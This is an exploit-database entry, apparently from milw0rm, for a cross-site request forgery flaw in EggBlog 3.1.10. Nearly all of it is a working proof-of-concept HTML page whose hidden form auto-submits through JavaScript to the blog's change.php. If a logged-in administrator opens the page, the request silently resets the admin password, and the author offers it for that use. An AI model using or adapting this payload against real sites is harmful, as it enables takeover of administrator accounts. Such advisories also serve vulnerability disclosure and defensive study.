EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)
Author: x0r
type: webapps
platform: php
port:
date_added: 2008-12-31
date_updated:
verified: 1
codes: OSVDB-51078
tags:
aliases:
screenshot_url:
application_url:
| |
| Project: EggBlog v 3.1.10 |
| Author: x0r |
| Email: andry2000[at]hotmail[dot]it |
|________________________________________________________________________|
Code:
<html>
<title>x0r :P </title>
<form id="forum-form" name="forumform"
method="post" action="http://[site]/[path]/change.php">
<input type="hidden"
size="30" id="forumpassword" name="password" />
<input type="hidden"
name="submit" value="Submit" />
<script>document.forumform.submit()</script>
</form>
</HTML>
With this csrf you can change the admin pass ^ ^
# milw0rm.com [2009-01-01]